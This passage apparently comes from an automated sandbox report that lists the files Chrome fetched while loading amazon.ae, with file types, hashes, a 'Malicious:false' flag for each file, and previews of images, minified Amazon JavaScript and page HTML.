                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........0..................................................................eoYd.Y.f.hf....,kJ6T..cY.f.g..z..5.6`.p.Y.._......^k:e....cI.#...............#...a4.0...8%.d......H4...p.q......JD..9$.0..l...y..,.....H.RM).w.~ c.SL).`%HC.0.PM..J.D.......e...H.R.(..."H......P7.T...0Ld..3Ry0.<.....u..=F4...o..-...L....b...D.........\r.=}E..QM)...~.X...,AB`......hi...U'..L2.*....'/:.i..~.......0..L.....4%PJ.g..\r.?..>^u....}....@.u,........Q,p.1Py.../......0:~i..~..B...`..R..h..4.(..b...._E..g..y.>..i.-...P..-..1....1. C.5"..yq..H.?...b...z.}w.@...t4...C.1. ......H..X.Y....3.f..v..a....I.....) b.......(..6L9l.OLy...Q..fu..1.e.......K@...h&......\."...Jy..Su{h.pBc..........L...........x.Y.^.ss.f....j..`.,..hh...C....R.SRyp...l..Y........j~..h..r.`X..4.....B..Q...x...[?...tt\..J.D%.(L..-.Q,b..4.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (609)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):26743
                                                                                                                                                                                                        Entropy (8bit):5.347138627237308
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:f1It/R8qLTNor9iviwO2AMVdnjnTzyFVBIXO6ZkLvnP7w2VxLQ/E2pNeHmnqjUYR:acmgkJVd/zMV56ZkLvxVx8fXoKA
                                                                                                                                                                                                        MD5:ABC38D8868C37FAF892916C89A4E5FBC
                                                                                                                                                                                                        SHA1:469738064CD0AEABAE8B4DAA2B679B587310134A
                                                                                                                                                                                                        SHA-256:FA8ED1F8E3AE60AB5AE81058050107B99A2AE4E5A34192BBAE3E41D35EC2693F
                                                                                                                                                                                                        SHA-512:158840D371AF384897DC3E11E2634F35FEFC895756A31CD4CFAE91325561EFF5CAF5CD4F125A16642BCD2AE6D5073467BF5390B63704A3DC84ED8525FB84C4BC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(e){var k=window.AmazonUIPageJS||window.P,l=k._namespace||k.attributeErrors,f=l?l("AmazonHomepageCardAssets",""):k;f.guardFatal?f.guardFatal(e)(f,window):f.execute(function(){e(f,window)})})(function(e,k,l){e.register("gw-video-orchestrator",function(){function f(a,b,g){return 0<a?Math.min(g-a,b-a):0<b?Math.min(b,g):0}function n(a){var b=k.innerHeight||document.documentElement.clientHeight,g=k.innerWidth||document.documentElement.clientWidth;a=a.getBoundingClientRect();var b=f(a.top,a.bottom,.b),g=f(a.left,a.right,g),c=0;if(0<b||0<g)c=b*g;return Math.min(1,Math.max(0,c/((a.bottom-a.top)*(a.right-a.left))))}function p(a,b){return a&&1===a.nodeType&&(a.offsetWidth||a.offsetHeight||a.getClientRects().length)?n(a)<b?!1:!0:!1}function m(a){a=q(a);a!==c&&(c&&c.callback(!1),(c=a)&&"hidden"!==document.visibilityState&&c.callback(!0))}function q(a){if(a)for(var b=d.length;b--;)if(d[b].element===a)return d[b]}function r(a,b){return b.priority-a.priority||n(b.element)-n(a.element)||(a.el
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3030
                                                                                                                                                                                                        Entropy (8bit):7.8440249204193355
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6gQeKWD+tqlOdqhiK2jMlBMPZgTiEU93kpMPWGYVppMVX+E3ofOffNYcUYtN:ToQiqql7L2jxWTiEU95WGYW1j3hNYcvn
                                                                                                                                                                                                        MD5:DAAA6DC15D970C9853EE63CD843E84F6
                                                                                                                                                                                                        SHA1:4832EF5D60E7F15796FCA8956E7C08B676BE47E8
                                                                                                                                                                                                        SHA-256:E7350D94E6050847DC6D4A3CFAD7B161751D2E592D68ED72CBBC2088FE0532D6
                                                                                                                                                                                                        SHA-512:5E94312EC7B301D0B7846B9E47A9562C1100864AD402861933F89512D0AF5FB2174A300AC5AD069EB2D15C00F6A07DB140688BA5EB661EFE7D93B0D8E402FB19
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/XCM_Manual_Coupons_DQC_44b7c125-ee97-441e-9257-50452eb12b8c._SY116_CB613590867_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1...Q"2Aq....#Ba..CRTr....$%d......................................................1..!Q."aq..AS..............?......H&""....z....D.."2I.DE..2........rBi..)Rj..fIzz.I?.....*L........U(=?Yb..e8..I+*".`.@....P.(...`,..t..K.~~r.D..MRH.$M.Y.dI..@...&&..=v.%....Fp.V....r34.......KG.Z..1.>..[[.t.g(.18.~..H.....x......D.......>.../..;DN6{.....Y..'P.=.V.[.aAi..).frx.8...WA.J....t.....F.r.7...Y=...K!Fd`C/*F...........?.cG+.36I..?....>.V./..`..._..=..`B.fl..&.g.Ks.t>.....o.}...+R4...G.).k....(T..S.......O...2.E.6.K..W...."".....f.-....OS..P.......v.8.U.sE...#....R8a...QyF..qV........*.....3gL..S.g....t9k.u.....'..3..A..........-xl..|0&..\...'..:}J........g....7.g......;Kc.*H..c-..nZ..v.}...S..r..7Tk...KtSO^Y..K..........z.Q@U4.#6.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):215
                                                                                                                                                                                                        Entropy (8bit):4.97423508161732
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:2LGDtF4IzO/Bqkhab4KYK7vfITow+1MRR1anMAuLhtI:2Q3JC/BVab4NK7vftjMzI
                                                                                                                                                                                                        MD5:2115ADCB9BE68682D036FDD4BB9BCFB0
                                                                                                                                                                                                        SHA1:4EA836ED7D69B815680D0A419BA4FFE1E1DCFD55
                                                                                                                                                                                                        SHA-256:51BF16CE55A5D6EA57A258B90F7ACBF586CE94A8770EA55860D345BB821BD2F5
                                                                                                                                                                                                        SHA-512:B1F0F9613CDFD0A08149779686CF185B1AB8FE514FC6CD89B5B6AF08D894006DBAA31D8916EE90B83517983575ADE235EDA8E5482C388A94678390A331F793EA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/01WZHXMa0NL.js?AUIClients/CartComparisonAssets
                                                                                                                                                                                                        Preview:(function(c){var b=window.AmazonUIPageJS||window.P,d=b._namespace||b.attributeErrors,a=d?d("CartComparisonAssets",""):b;a.guardFatal?a.guardFatal(c)(a,window):a.execute(function(){c(a,window)})})(function(c,b,d){});
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):39588
                                                                                                                                                                                                        Entropy (8bit):7.951269065390308
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:8wTP7nctQ5TQWIMdy2B7rptNxyY1skUA0Vvn3ZnajvK8mVrqYygr1X5r:TPwmXQ0HTNxym0V3ZnajS8mZxr
                                                                                                                                                                                                        MD5:A3E2EDBF849F0DA6A7B6B70E617363BB
                                                                                                                                                                                                        SHA1:B8568511F38B26012815EE56BC63072A2306E759
                                                                                                                                                                                                        SHA-256:9A0A411DBB9C2F5A8763708AA4AB71F5B36F9BCD89476FB81D36DF14E4F3230C
                                                                                                                                                                                                        SHA-512:C76FC93DD481C277F626F74CC30A26F9795F8D6354FF422E1A5320739454AAE0AB78CD22C25C8E58D893506ECE20573FE611C2589BAB2C85F03BBB45F9F33A11
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986215_UAE_Budget_Store_AE_xsite_bubbler_generic_en_400x400_2X._CB644457596_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................................;.................................................................................5.......Z.9....ao_..&..L..Th.}.c.W.'....]...V.................>>fPL+.z.......ee0.....z..l..mget&..L.z............>...[.zE...V.}..........8cw;}.].m/8.*.........../35......}w.,........P..+fR.6$...IO.X..9.%,sbI......E..F.}...........cf-/h7I.a.}M....d.*4.1t..lIO.X..:.%,ub..jX..&...A.....l0......5g.{..+......8....c..o|..{E.........e..=)..!.p........{[..@?D\.............6{.m..........{^..j...M........y..~..Y.Z.7g..O....k.......7Y.gI..........C.....iO.0....h?Kz...F.......d.ZN.8.... ......^~.....c.....A8.(x......2V..a.V..G2..K...o..D...,N...r.?=........M.~.4..t.[...*.<.~Rya...o.^.]B....r.fo.e.*.!......./......Q.........q|...Xs.b..r..p.}^9yW.6...e@.....6....z..@.......J.[`.o.M.g....n.......x7..uoj.t.N...rW.<..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9416
                                                                                                                                                                                                        Entropy (8bit):7.858682165622051
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Yz5bN2/h9nsM4q9xe9XBfssssssssssLQkVts7uxjCG6IimDB:M2/yqbe7ssssssssssLQkVa7uxjZnDB
                                                                                                                                                                                                        MD5:66FD5911E870575C02253E729B4DBEFE
                                                                                                                                                                                                        SHA1:348414EAEBDB79AC5C031F2081FCD84FDF066C4B
                                                                                                                                                                                                        SHA-256:D4E22F8480F3D391BF5CD2255CBA9CA5322CCDF7C5853671D6CC21FE12E870E6
                                                                                                                                                                                                        SHA-512:70B7D7DC3F99D540A759148ABC81FB9CE7921FB2CE449B87129809F858427296C421A6E2869447744EF8FD4DC270A7980461F060C986423709972A0CBEFE166B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................................................................................................................."..........4...........................................................................x8.}W.=.).{r...-......{...............[}.. .........=..{..5..t.[).l."..........=..i.V.C`......=.....2..L...D:........4q...KD<......m,..Y.Y.....;..Vt..I>:\Mh#....Oy.....H$.......C...Q......%..9YVN....tyYR.....{=O<X......N~..nBH@....=.i.5......Mh..86.....f.._.'....?.0........z.}.......{sF..C`.....b-h...-.*.*........q.;...d.y.............'..].GP.........=..x.......x........W..H........Y.............`.......|...E...G.....@.......%..)w........~.N..r./(..a...G......oS.y..{......JaCT.........w.gI.X..N...F.^..w.....~n;.n}|..G.s.uC.>.......647..*.)..R......u..t...&..&..6..{.~8............)5 .Km.s..q......ZZS.].S\.y........]/7.gJ.....Z.[.px..:.....v...$......~g'U..._E .........k...{..|.........t......4;..<
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):531631
                                                                                                                                                                                                        Entropy (8bit):5.432636208001531
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:JQvrNsZU0dtWA0uc037p0c/DrViaOdSS7D7giAo++GQWlBk0BMw1RyHw1OvxfOH0:JkS+v+JlBVkHuOpfOHm05F7uM3VdjQ
                                                                                                                                                                                                        MD5:683E96A5320A5903EEE74842DA73F5C7
                                                                                                                                                                                                        SHA1:97FEAFE8A7C6ECCF9618FF7D0792CCC8E3E25195
                                                                                                                                                                                                        SHA-256:C5FC19B5C599C8521A55397A8A4EFE377F2A846448303783B6BA427CA8344ED9
                                                                                                                                                                                                        SHA-512:489FA4517134581A99A35709747827FFDE903799EFAC6D81952B5700658CD5030C689543970B340ADC0A85AD3C9DFD9283818EC82F6486C91A06151A53C8B89A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:/*! For license information please see vendor-d534662e77be2ead0b49.min.js.LICENSE.txt */.(self.discountWidgets=self.discountWidgets||[]).push([[736],{4170:function(e,t,n){"use strict";var r=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0}),t.AmazonImageComponent=void 0;const a=r(n(7294)),o=n(6726);t.AmazonImageComponent=({physId:e,height:t,width:n,weblabId:r,weblabTreatment:i,clientId:l,altText:s,className:u,isATF:c=!1,scalingType:d=null,extension:f="jpg",title:p,style:m,dataSet:g,id:h,onLoad:v,onClick:y,onError:b,ariaRole:T})=>{const _=f||"jpg",E=c?"eager":"lazy",O=u?`a-amazon-image ${u}`:"a-amazon-image",S=`https://m.media-amazon.com/images/I/${e}._AC${r&&i?`_AIweblab${r},${i}`:""}`,x=S,w=`${S}_FMwebp`,I=`${S}_FMavif`,R=l?`aicid=${l}`:"",C=R?`?${R}`:"",P={dpi15:58,dpi20:58},N={dpi15:65,dpi20:65},A={dpi10:85,dpi15:80,dpi20:80},k="CenterCropSquare"===d?{dpi10:`_UC${n},${t}_CACC,${n},${t}`,dpi15:`_UC${1.5*n},${
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4058
                                                                                                                                                                                                        Entropy (8bit):7.670685813872088
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:R90kUkg7u9q9VQxAsCHZou955WwkyEoH7+Mj7EE5TR:gLeq9Vg2DPqM8EL
                                                                                                                                                                                                        MD5:AD2F396F894FB5783BC9B0C129CF1E9D
                                                                                                                                                                                                        SHA1:2995D29D1633819C92370AAEBFC7099F86668B40
                                                                                                                                                                                                        SHA-256:74D21ED6150E08EDDA27FD3A4A09442A476F50F62A8050E82488DBCB172CB399
                                                                                                                                                                                                        SHA-512:CFA4CCDCDBE0C364828820F9B3D1C9C4C7D872E14E616CE595390EBA6556FB8333B2AA9840226045940EEEC1B99445DC3EFE7959EE31BD29FA983CDF55A67549
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_18_BTS24_AE_GW_QC-CROSSA_DQC_CL_Beauty_186x116_EN._SY116_CB566993070_.jpg
                                                                                                                                                                                                        Preview:......Exif..II*.................Ducky.......(......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:676F8B9C478A11EFBAE58FF32B0F82A0" xmpMM:InstanceID="xmp.iid:676F8B9B478A11EFBAE58FF32B0F82A0" xmp:CreatorTool="Adobe Photoshop 2024 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="1D2D8B369F8CAF40DBD3A97E2A12B827" stRef:documentID="1D2D8B369F8CAF40DBD3A97E2A12B827"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d........................................................................$$''$$53335;;;;;;;;;;.............................%......% #...# ((%%
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (11115), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11115
                                                                                                                                                                                                        Entropy (8bit):5.337650855535322
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:1pbJWreb26qpOaby4gajwJeY1WOO5wKZBBOlIY44Bqb/tS:Mreb2thY5STJbQ
                                                                                                                                                                                                        MD5:BF4E1F374BB39E19D3D0E4FDEC6B1262
                                                                                                                                                                                                        SHA1:033CBD9D3A22FEA4F68382D2EA288F02AE49D44C
                                                                                                                                                                                                        SHA-256:9ECC35EB2B04506198971EA8AE65DAAABB0E722A6BBC0950719B19B69FD4B043
                                                                                                                                                                                                        SHA-512:C148107964C11BD6AFAB3D585EB4C60B7CC813F6B53B36CDA251E8BA086FA613220E70EF471D0204DB128C8478C00DDDA22655D28EDF79A45A06931B8B2EA0AD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:var DACXImageTemplateCreative=function(e){var n={};function t(r){if(n[r])return n[r].exports;var o=n[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.r=function(e){Object.defineProperty(e,"__esModule",{value:!0})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,n){return Object.prototype.hasOwnProperty.call(e,n)},t.p="",t(t.s=15)}([function(e,n,t){"use strict";var r="undefined"!=typeof MSFClient&&MSFClient;n.a=r},function(e,n,t){"use strict";t.r(n),t.d(n,"readStringFromCookie",function(){return u}),t.d(n,"writeString",function(){return i}),t.d(n,"readString",function(){return a}),t.d(n,"write",function(){return c}),t.d(n,"read",function(){return f}),t.d(n,"isSupported",function(){return l});var r=864e5,o=365;function u(e,n){var t=function(e){if("string"!=typeo
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):51165
                                                                                                                                                                                                        Entropy (8bit):7.990597824600076
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:1536:Vb9jObXNe/3jchBs4UDYjekB+x8PWjgZxY:VJjiQPjcDQ+BO82UxY
                                                                                                                                                                                                        MD5:DD104732C8C554800E667C02AB4C4A93
                                                                                                                                                                                                        SHA1:9AC6EA3607209075C333CA58AD7ABCE72D6B5601
                                                                                                                                                                                                        SHA-256:EC11BC6865C20DF0C16D6CC19EC67DE1B033EB2ECA5DDDC29401FB08F41DD633
                                                                                                                                                                                                        SHA-512:6FA034CA22C5C23768F638C7E094DE34A4586BD1CCFBD5349BFA9AB30310809FF068B6DE1A19B5E0418ADB76093A7A13A18E86389E5773801D639EBD67174138
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_05_notebook_en._CB568181090_.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE..U)e...............S.....T.....M.....V!p.'g...........m.%v...Q!p.".=...$t....!s. k...."s.)b....$u.&j.))^.....L..O*,f......*y....(3B..P*f..Q.$0?.L. l.xu..X..}...Z|x....vr..(7....!1...........*..%..Q.......L...pl.hd..........D....\Z.........)2t[......A@t............:.RQ.ioy............${...t....Z..............+B.RR............W"!VZbo...wv...H....a.'Z.......eb.....\.Dx....qp.9DS..bMWe....h............v}.......`c.CD........%e+Q.R............W...6..H..f..;...f.4o...18I:m..t........+j.N..)t.B~.f.....R.j...X~....h..O...q..q..De..p.K...?mU.....~CK[...f...\..zw..T...Xw....u...........7.......t..../..@........h|...[...c.....9v.<....;.....2...9X.g...N........Lm..d....m....a1@.......t....K]...o..l.T..^.................*.[+.w$....F.fl... .IDATx...k\...g.ax..."...."..2..V....c...\.,.p`.....;+.m....la"W.[...\..(..#.mX...>..{.{...x...Z?.$..G.s......8........vg0..M_.o>.....!.f?.....(<.....4|*u.OIG^os..(......,.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (542)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12254
                                                                                                                                                                                                        Entropy (8bit):5.266663659098461
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:gqh6rMupPgt/hoSVEAmHto3GyZFP3RXFjFa4ZEFIvZPsi04ZqffOvZPEV1:gFV4HmN2ZXDjsvffgc
                                                                                                                                                                                                        MD5:B5C854FA1E601BFD190CB9B1528F3BD3
                                                                                                                                                                                                        SHA1:651DB75B7F37D4B41A326186B0685C2E1146002E
                                                                                                                                                                                                        SHA-256:A65C65158FB5A78F9208B79EB060EB8F014176E73248632F57BEC7B325EFDE53
                                                                                                                                                                                                        SHA-512:39F7DFCA7D57BB4DA70E01695D9A527CA5CED08170080F8C96F3196702D27C5D9F5EFB9238C534F1CCD753DBF48F8CDF23158D33EC087763E5B0B9E9B2DA842D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(e){var b=window.AmazonUIPageJS||window.P,t=b._namespace||b.attributeErrors,l=t?t("F3CommonCartAssets",""):b;l.guardFatal?l.guardFatal(e)(l,window):l.execute(function(){e(l,window)})})(function(e,b,t){function l(){var a=document.querySelector("#localMarketRecommendations");if(!a)return{};var d;return{preSuccessCallback:function(){d=a.getBoundingClientRect().top},successCallback:function(){var f=a.getBoundingClientRect().top-d;b.scroll(b.scrollX,b.scrollY+f)}}}e.when("A","F3CartSelectors",."localmarket-cart-actions","localmarket-accordion-view-state","localmarket-accordion-view-content").register("localmarket-accordion-view",function(a,d,f,m,e){function n(){var a=d.getOutOfStockElement();d.getSequentialCheckoutContainer()[0]?p(a[0],68):p(a[0],0)}function h(a,f){var g=d.getCollapsedCart(a),q=d.getCollapsedItemList(a),b=d.getAccordionItemList(a);e.isAccordionContentShown(a)&&0<g.length&&p(g[0],60);q.add(b).slideToggle(600,function(){m.enableToggling(a);f&&f()})}function k(a,f){f&
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (7131)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):603923
                                                                                                                                                                                                        Entropy (8bit):5.704994222990189
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:0+nlfWXQbnMIS05RnlJPUdcAWL4WFOnT8sB6FkV82hC7JdxtlKgLiWY2z9gWYze2:xlfWXQbnMIS05RnlJPUdcAWL4WFtkAiL
                                                                                                                                                                                                        MD5:319A2BA1486951736177EF0F44B7DB6B
                                                                                                                                                                                                        SHA1:5C8B1B8DDEC1C530C25565BE19BE725F98ACAF36
                                                                                                                                                                                                        SHA-256:FCE0092B0D6131C9A63AB58752690DACEE727D344CB9C69E2BAF7A908FFC54CD
                                                                                                                                                                                                        SHA-512:4FC9EEEBEB8968EBFE96B6D3ACCEF314C93A328C86751908D147F1BC33860F41F56A13CA31A03042DA518DA441F2BC2D71680154B791371397E6446150F2987E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/
                                                                                                                                                                                                        Preview:<!doctype html><html lang="en-ae" class="a-no-js" data-19ax5a9jf="dingo"> sp:feature:head-start -->.<head><script>var aPageStart = (new Date()).getTime();</script><meta charset="utf-8"/>. sp:end-feature:head-start -->. sp:feature:csm:head-open-part1 -->..<script type='text/javascript'>var ue_t0=ue_t0||+new Date();</script>. sp:end-feature:csm:head-open-part1 -->. sp:feature:cs-optimization -->.<meta http-equiv='x-dns-prefetch-control' content='on'>.<link rel="dns-prefetch" href="https://images-eu.ssl-images-amazon.com">.<link rel="dns-prefetch" href="https://m.media-amazon.com">.<link rel="dns-prefetch" href="https://completion.amazon.com">. sp:end-feature:cs-optimization -->. sp:feature:csm:head-open-part2 -->.<script type='text/javascript'>.window.ue_ihb = (window.ue_ihb || window.ueinit || 0) + 1;.if (window.ue_ihb === 1) {..var ue_csm = window,. ue_hob = +new Date();.(function(d){var e=d.ue=d.ue||{},f=Date.now||function(){return+new Date};e.d=function
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (595)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):52976
                                                                                                                                                                                                        Entropy (8bit):5.315043781142496
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:/OwplOVh9aGPNItQPtazaikxMXXPB+YQycmcUOzheEfbTAYfnrIulbsksLZHU:Y9kXcmmzhe4vJrPsks6
                                                                                                                                                                                                        MD5:08ADE75238D50BE6B835CB9EB47F77BE
                                                                                                                                                                                                        SHA1:1283D0AD3A738552036F4AC495484DAB0E4F7C24
                                                                                                                                                                                                        SHA-256:D6F8F9D8EEF0165B139120551326140D8693B6309A64E55FC40DE19BE21C614B
                                                                                                                                                                                                        SHA-512:10790BEA14F378A0722FD5D6CF5683C45A3F5DE253CB1BC25126A96BE70D5D83E7BF9029CB974C7F8B8C10A4FA537A3A09B9A5DB97CD69E9A937EFF271F841D6
